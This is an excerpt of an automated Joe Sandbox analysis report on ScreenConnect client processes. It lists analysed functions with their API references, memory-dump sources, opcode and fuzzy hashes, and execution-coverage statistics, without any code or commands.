Opcode Fuzzy Hash: 330c461167a770f3c2f76c8f0fdb34721af6423dd945069d57d90ccb03d95867
Instruction Fuzzy Hash: 9C1103B58002598FCB20DF9AC4447DEFBF4FB48324F11846AD459A7350D378A944CFA5

Function 05D23619 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05D2367E

Strings

$;#, xrefs: 05D2363F

Memory Dump Source

Source File: 0000000B.00000002.2978513912.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5d20000_ScreenConnect.jbxd

Similarity

API ID: ProcessSession
String ID: $;#
API String ID: 3779259828-1209804496
Opcode ID: 4671e3c496b45838532737986a6c60d6dd6fcef123e14b2670efdbc128051f15
Instruction ID: 0e83308b6f5b896345ae78c134b9a5a8ec8c79c5c29b5893305fcec9f392685f
Opcode Fuzzy Hash: 4671e3c496b45838532737986a6c60d6dd6fcef123e14b2670efdbc128051f15
Instruction Fuzzy Hash: D81112B1C002598FCB20CF9AD844BEEFBF4FB48324F14846AE459A7240D779A549CFA5

Function 0142D688 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef63cad69227f2c3b06f470bbbe11670be667cc918b317735cc7efb7a5836000
Instruction ID: e4eda1d608dd3ae285eea7a28089f315ef73313dc0d757d9f08e5ffb3b72a373
Opcode Fuzzy Hash: ef63cad69227f2c3b06f470bbbe11670be667cc918b317735cc7efb7a5836000
Instruction Fuzzy Hash: F0213371904280DFCB01DF58D9C4B27BF65FBD8314F60C16AE8094B266C33AD496CAA1

Function 0142D683 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 89b22454263a4b682fc6f2affc044aec8c151f21b93dc4ab601e86b018b775e2
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2B11B176904280CFDB16CF54D9C4B16BF71FB94314F24C5AAD9090B266C33AD45ACBA2

Function 0142D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2b81b9f2d54dc200c76fde55bfe4a9d95ce7fcc891d384ac32a5da94fee3de
Instruction ID: 9d56d14fcaa383df81a5e3139163796d7f24d6f810c516fb9f1b21428e3456e7
Opcode Fuzzy Hash: 2b2b81b9f2d54dc200c76fde55bfe4a9d95ce7fcc891d384ac32a5da94fee3de
Instruction Fuzzy Hash: 1A01407140D3C09FD7128B258894752BFB4EF43224F19C1DBE9888F2A7C2799849C772

Function 0142D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2959137428.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_142d000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04c2db420f47c318c5b6eaff5b42d4014e01bc918e31f421face760dd4f28eba
Instruction ID: f0212826f69cd4551003bf940b3e9d4f3bf75a4e6bdb1159632770ccff66a21d
Opcode Fuzzy Hash: 04c2db420f47c318c5b6eaff5b42d4014e01bc918e31f421face760dd4f28eba
Instruction Fuzzy Hash: BF01F7B18083109AE7104A69CD84767FF98EF413A8F08C56BED584A2B6C27DD886C6B1

Function 045CFE40 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed82f21ad8a9f277f4004b72e80dc4e173ff398c7094b7fd602f6252c4db7c2
Instruction ID: 08a75f01d17a6fb104ef7b4ec3423bbc31c99ac7797d1bb8b2d3e986bafcf5ea
Opcode Fuzzy Hash: 6ed82f21ad8a9f277f4004b72e80dc4e173ff398c7094b7fd602f6252c4db7c2
Instruction Fuzzy Hash: 51F054323002145F8710DA6DE844D5BBBEAEF896A0750852AF419C7354DB71ED4587A0

Function 045CFD60 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f34d9a37a7553e223de0593d6bcc02e40a231a275cf0496668df9fe659fae9
Instruction ID: 68f4224fbc729f5928bb9906414dfd49dcd892b842aa422ada77d950b08595f0
Opcode Fuzzy Hash: 78f34d9a37a7553e223de0593d6bcc02e40a231a275cf0496668df9fe659fae9
Instruction Fuzzy Hash: 03E0E521300112AB4604767EA44887FB6DBDFE95707A0833EE12ADB3D4DE24DC0543A5

Function 045CFF60 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afd0a2d0a52cffb44e7864040ae686151b77dd4363b5d52d1f29f634bc91f214
Instruction ID: a3ab0bdfcbbff07adae57894083275a688051f5253b6388d15bcae8e8d1c8fc1
Opcode Fuzzy Hash: afd0a2d0a52cffb44e7864040ae686151b77dd4363b5d52d1f29f634bc91f214
Instruction Fuzzy Hash: 47E092373001145F8304AB7EA4008ABBB9AAFE5770318803BE68587355DD31DC01D3A0

Function 045CFF38 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109501ece3e18c269e58e07650298fe7127e7fcf7e8eb5a1b543274c9fb616bc
Instruction ID: a857ba81bb14204750c77b912bc908f5b67d7b672e9be9ab3f9135ae79a8a0af
Opcode Fuzzy Hash: 109501ece3e18c269e58e07650298fe7127e7fcf7e8eb5a1b543274c9fb616bc
Instruction Fuzzy Hash: FFC09276180208EFC700DF59D844C857BB8EF2977170140A1FA088B332C732ECA1DA94

Non-executed Functions

Function 045C106D Relevance: 7.8, Strings: 6, Instructions: 250COMMON

Download Yara Rule

Strings

*n, xrefs: 045C1155
4'kq, xrefs: 045C12DD
4'kq, xrefs: 045C1376
4'kq, xrefs: 045C10FD
4'kq, xrefs: 045C1259
4'kq, xrefs: 045C10EB

Memory Dump Source

Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$*n
API String ID: 0-427385658
Opcode ID: 20fc106b4cf6de9d067be5d1519ad97a709cbc57d305ac3e344a5192a9d970ff
Instruction ID: ee2a5b27ec59478657863e7f53b87311fe27a7e0253218db1b6b691cc7829d11
Opcode Fuzzy Hash: 20fc106b4cf6de9d067be5d1519ad97a709cbc57d305ac3e344a5192a9d970ff
Instruction Fuzzy Hash: B6A1D0706007418FD715EF79D55028DBBF2FF99604B408A6EC046AB36ADB78FC498BA4

Function 045C10C0 Relevance: 7.7, Strings: 6, Instructions: 225COMMON

Download Yara Rule

Strings

*n, xrefs: 045C1155
4'kq, xrefs: 045C12DD
4'kq, xrefs: 045C1376
4'kq, xrefs: 045C10FD
4'kq, xrefs: 045C1259
4'kq, xrefs: 045C10EB

Memory Dump Source

Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$*n
API String ID: 0-427385658
Opcode ID: 062e14aa1378ed1546af32eb8cb702e8130c7ab523d59e6d4ab28a1829d8692f
Instruction ID: 4901daaa129f2e2a81444e79104cc30368a98b9e8e1402c53d2da44369e17de7
Opcode Fuzzy Hash: 062e14aa1378ed1546af32eb8cb702e8130c7ab523d59e6d4ab28a1829d8692f
Instruction Fuzzy Hash: 7F91C3706007029FD715EF79D54069EBBF2FF98700B508A2DC049AB369DB78F9488BA4

Function 045C10D0 Relevance: 7.7, Strings: 6, Instructions: 211COMMON

Download Yara Rule

Strings

*n, xrefs: 045C1155
4'kq, xrefs: 045C12DD
4'kq, xrefs: 045C1376
4'kq, xrefs: 045C10FD
4'kq, xrefs: 045C1259
4'kq, xrefs: 045C10EB

Memory Dump Source

Source File: 0000000B.00000002.2973521852.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$*n
API String ID: 0-427385658
Opcode ID: da5837ada57e2896b0b44e3a1c31d781df6d49deb28650c1568aaa854b011c41
Instruction ID: a9b64ff3e978e5327f11054d702315ac70be9af60343259593d18f848a81be93
Opcode Fuzzy Hash: da5837ada57e2896b0b44e3a1c31d781df6d49deb28650c1568aaa854b011c41
Instruction Fuzzy Hash: 1181A2706006029FD715EF79D54069EFBF2FF98704B508A2DC049AB368DB78F9488BA4

Function 01CE4D30 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL(0000009C), ref: 01CE4DBE

Strings

$;#, xrefs: 01CE4D5C
$;#, xrefs: 01CE4E1D
`Qkq, xrefs: 01CE4DEB

Memory Dump Source

Source File: 0000000B.00000002.2961462272.0000000001CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1ce0000_ScreenConnect.jbxd

Similarity

API ID: Version
String ID: $;#$$;#$`Qkq
API String ID: 1889659487-1160251708
Opcode ID: 59aa2017a66d1aa9b80a3028c80afc5debf691036e4602d01da9aa1a0894daff
Instruction ID: da576d9aec33d2c06db91e703c5782da60855c7c1ce6603ff0325e247463ba82
Opcode Fuzzy Hash: 59aa2017a66d1aa9b80a3028c80afc5debf691036e4602d01da9aa1a0894daff
Instruction Fuzzy Hash: 59212870901269DFEB64CF19D844B99FBB9FB08314F1082D9E50CA7650C775AA98CF92

Analysis Process: ScreenConnect.WindowsClient.exePID: 7544, Parent PID: 7476COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	37.5%
Total number of Nodes:	8
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BB85621 Relevance: 2.5, Strings: 1, Instructions: 1227COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB8646A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 21afa1e750a6e2c14c04c23bf2fab9da677f719aa982b0949cfb61a890750af5
Instruction ID: 96cf1cb5941b073ca678530274f205e5a311b9caf0a7bd0c1f02f880fd9332b7
Opcode Fuzzy Hash: 21afa1e750a6e2c14c04c23bf2fab9da677f719aa982b0949cfb61a890750af5
Instruction Fuzzy Hash: A5820831B0EE4E4BE7B8AB6894756B973D2FF98348F55007AD45EC71E6DD38A9018340

Function 00007FFD9BB85834 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB8646A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 249a64748ea089cbc5528180db3f62e3964920940df6a1b2fd06548936df1d6b
Instruction ID: 21d05652c723fbe0684b3913c6402bf8da1740f339621e99bfa933491612dfe7
Opcode Fuzzy Hash: 249a64748ea089cbc5528180db3f62e3964920940df6a1b2fd06548936df1d6b
Instruction Fuzzy Hash: B0E1CB31B0AD4F4AFB759BA884746F962D2FF98348F560079D44EC72E6DD38BA068341

Function 00007FFD9B873642 Relevance: 1.7, APIs: 1, Instructions: 173
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateNamedPipeW.KERNELBASE ref: 00007FFD9B896163

Memory Dump Source

Source File: 0000000C.00000002.2975394190.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: ad90d78e41d3b3bb54b71475a344551e36c3e53b39a44b7b46044c71b2ccb0a2
Instruction ID: 7e87d0b9ed88e7cb8e13e4b814c3fcad9adef7858975288ef603fcd01892f5f6
Opcode Fuzzy Hash: ad90d78e41d3b3bb54b71475a344551e36c3e53b39a44b7b46044c71b2ccb0a2
Instruction Fuzzy Hash: 9451A17191CA1C8FDB68DF5CA845BE9BBE0FB59720F1442AEE04DE3251CB70A9418BC1

Function 00007FFD9BB863C2 Relevance: 1.6, Strings: 1, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB8646A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 2f02fa2d738769a605f87c6dfbd6688384c56d0687533305e5cf6c63aab07398
Instruction ID: 4832c2daf5730dccbd7f3cfe72738bdfd583ba691ec15c65c3f07797c5d6c9cf
Opcode Fuzzy Hash: 2f02fa2d738769a605f87c6dfbd6688384c56d0687533305e5cf6c63aab07398
Instruction Fuzzy Hash: 53C1A431B0AE4F4AE7799BA484756F962D2FF94348F560039D44EC72E6DE39BA028241

Function 00007FFD9BB862E9 Relevance: 1.6, Strings: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB8646A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 177e87342e9d77e8cd130926564dc3d1f20784c5a8456976649ca44dc986c375
Instruction ID: d1edd785bc763de09d429d7bbc89701a94f1c9be301ddf01fcb628354678d596
Opcode Fuzzy Hash: 177e87342e9d77e8cd130926564dc3d1f20784c5a8456976649ca44dc986c375
Instruction Fuzzy Hash: 05C1B731B0AD4F4AF7B5A7A484746F962D2FF98348F560079D44EC72E6DE38BA028341

Function 00007FFD9BB86468 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f28d71b2b276a34f68ad4e98b8656b5b630605f43457aa0d08d82c64735ed5
Instruction ID: 04d99295ebef5ef43e9b3959a953fef40412f857b8e59fd64c771690d4515d19
Opcode Fuzzy Hash: 44f28d71b2b276a34f68ad4e98b8656b5b630605f43457aa0d08d82c64735ed5
Instruction Fuzzy Hash: 68A17331B1AD1F4AFBB5A7A484746F962D2FF98348F560039D40FC32E5DE39BA019680

Function 00007FFD9B878014 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B878142

Memory Dump Source

Source File: 0000000C.00000002.2975394190.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: fd76a64adbb20af10777783cb695d2c9b1e58d35246cef367068ae50ee732756
Instruction ID: 67a90bd6b6af9e926ec224fe119b2a845d54bed786f47de4aa8264090bd55c48
Opcode Fuzzy Hash: fd76a64adbb20af10777783cb695d2c9b1e58d35246cef367068ae50ee732756
Instruction Fuzzy Hash: 92412831D0DB494FDB29AFA8984A5E97BE0EF59310F04017FE049C3292DB78A9468B91

Function 00007FFD9BB84765 Relevance: 1.7, Strings: 1, Instructions: 417
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFD9BB8485A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 672ab1a2803bae2dbfcab6754f9a61d4c2c57acd7af3d5bfe5e9499c0500b429
Instruction ID: e1ddc934f9c1d9833726612791f40ed50009ba8b39d839366d1a41b6972c0a7d
Opcode Fuzzy Hash: 672ab1a2803bae2dbfcab6754f9a61d4c2c57acd7af3d5bfe5e9499c0500b429
Instruction Fuzzy Hash: 63C13632B0EE4E0BEB68EA1898A28B573D1FF55354F05017ED44E875E6ED34B94AC381

Function 00007FFD9B873AA2 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD9B878142

Memory Dump Source

Source File: 0000000C.00000002.2975394190.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b870000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: 420b3010a2a96fb8a7cdb3fa7c50b06283f871c9e6848394c3276eef644346e0
Instruction ID: 1aaaa4419df4ffd5592ca908b5a602d0e8f5a913089580bfb99460d2d38ebbaa
Opcode Fuzzy Hash: 420b3010a2a96fb8a7cdb3fa7c50b06283f871c9e6848394c3276eef644346e0
Instruction Fuzzy Hash: 1921D731918B188FDB28AF9D9C4AAF97BE0EB59711F00412EE049D3251DB74B8468B91

Function 00007FFD9BB87CBD Relevance: 1.5, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB87D0A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: bb6f925b23e3426059f5128c6f62e6f08f4ea56fbbf0d861e634ea8438b33587
Instruction ID: ff2138c12271272bab32015337d5891ac5512b7bc6a1e397e08906cb92b43fb5
Opcode Fuzzy Hash: bb6f925b23e3426059f5128c6f62e6f08f4ea56fbbf0d861e634ea8438b33587
Instruction Fuzzy Hash: DA517B73A0EE4E4BEB75EA5998A45E977E2FF94319F05017AE04CC31F2DE3468058741

Function 00007FFD9BB84D79 Relevance: 1.4, Strings: 1, Instructions: 139COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB84D8A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: fb8ad01b8858ac15fc0ab87965e88fa11b6c85ae0cf8d6285ce767d7a0eb7021
Instruction ID: f208797eab50be19796ca1a20151b1200d102e249ad0549147d561bbf6f013e7
Opcode Fuzzy Hash: fb8ad01b8858ac15fc0ab87965e88fa11b6c85ae0cf8d6285ce767d7a0eb7021
Instruction Fuzzy Hash: 97416371609A4D8FDF98DF28C8A4AA537A1FF59318F1505ADE41EC72E2CB35E952CB00

Function 00007FFD9BB881C9 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB881EA

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0969c520d14d99f50ea522bed7673d3b7502c04116a8dbd9f1c9d03f4cbc201c
Instruction ID: 9362734642e98c5dbed55332e1f818c86391d7b8b818c76145c0d224b2106def
Opcode Fuzzy Hash: 0969c520d14d99f50ea522bed7673d3b7502c04116a8dbd9f1c9d03f4cbc201c
Instruction Fuzzy Hash: 7031C932F0EE4D4BDFA59A585C312E93791FF45354F0501ABE54CDB1E2DA29A9008641

Function 00007FFD9BB87E7A Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

W, xrefs: 00007FFD9BB87EEA

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: bee74574c5d6e983d0ee068ef397e675b0acc862da8957267c6e6e8b045f7d3f
Instruction ID: ae3009837e06a8594fcf33fb4bffbda6db2139f5bb9196605d13050415b16633
Opcode Fuzzy Hash: bee74574c5d6e983d0ee068ef397e675b0acc862da8957267c6e6e8b045f7d3f
Instruction Fuzzy Hash: 38215A3261DE8A4FD769EB359C604A57BE1FF85318F0506FAD04DC31E6DA38A802C741

Function 00007FFD9BB84C0D Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB84C1A

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 250004376e188068fa2163e1605528a671241e4b0dcb133740cc087759b026c4
Instruction ID: c062318931ec4cd5c5ff5a1ae4ab34921062bdd227704aede984815077271e0f
Opcode Fuzzy Hash: 250004376e188068fa2163e1605528a671241e4b0dcb133740cc087759b026c4
Instruction Fuzzy Hash: 8311A271E0DF4C4BDF94DBA458A55A93FA0FF59304F0600AEE058C32A2DA746500CB42

Function 00007FFD9BB83840 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 678b22fc545426e773d0b3ab102b6beaf39a6b3e80ce97b9354f6c4cf5377e3c
Instruction ID: c7391e9b7650428c8dd301218d9d2820cea70aba37a217fccffce21b6800d211
Opcode Fuzzy Hash: 678b22fc545426e773d0b3ab102b6beaf39a6b3e80ce97b9354f6c4cf5377e3c
Instruction Fuzzy Hash: 67B1E235B0DA4A8FDBDDEB68D0A06E477A1FF54318B2405BAC059CB1DBDA35E842C780

Function 00007FFD9BB82129 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd1fab99f637a2e1e448d2c0d2936727f2cffe1de4aeb6e1200440199c54eb7
Instruction ID: d277bc2c7c84b04e2f9d251d65d2cb84b0a6ce64f0b4468d4b39b8f5e290ea05
Opcode Fuzzy Hash: 0cd1fab99f637a2e1e448d2c0d2936727f2cffe1de4aeb6e1200440199c54eb7
Instruction Fuzzy Hash: C961C77270EE494FDB98EE6894A1AA477D2FFA4354F0501B9D44DCB2E6DD35F8028740

Function 00007FFD9BB838D3 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0239808748a1234eb185ed5de5eee6c918d07af3c7b11e302238bc6582b55cc4
Instruction ID: 70739a02d4d32c00aa3edb6802b1747bbfae5d0061eee6414084fd442078977a
Opcode Fuzzy Hash: 0239808748a1234eb185ed5de5eee6c918d07af3c7b11e302238bc6582b55cc4
Instruction Fuzzy Hash: 18619235B09E0A8FDBDCEF58D0A06A577A1FF58308B2445B9D05ECB19BDA35E846C780

Function 00007FFD9BB834C5 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2df1482f1f2fd3af54b418722b7b9a3f29b4c10c54242d28a06a97ffa4c87619
Instruction ID: adb3f5819ac954280636994f3c17b2a80961721c37680bd54a5f15492e7adc51
Opcode Fuzzy Hash: 2df1482f1f2fd3af54b418722b7b9a3f29b4c10c54242d28a06a97ffa4c87619
Instruction Fuzzy Hash: 0331C42250E3D55FC717AB68E8659D57FB0EF4322870A01E7E0D9CF0A3DA18594AC362

Function 00007FFD9BB858BC Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2981433738.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bb80000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59ee4ead1ff2d62f9ca8598a01f4bdfb0cd771a90a6d2d2fdc3f6288d89df3ac
Instruction ID: 4fd145e800bd2beee16e4b226b3fb7e48dcecf338199ebb6b382eed07e3871d9
Opcode Fuzzy Hash: 59ee4ead1ff2d62f9ca8598a01f4bdfb0cd771a90a6d2d2fdc3f6288d89df3ac
Instruction Fuzzy Hash: BA11E921B0BD1F4AFFB89B5844B06B812E1FF59318F49017DD44FCA1E7CD28A9058650

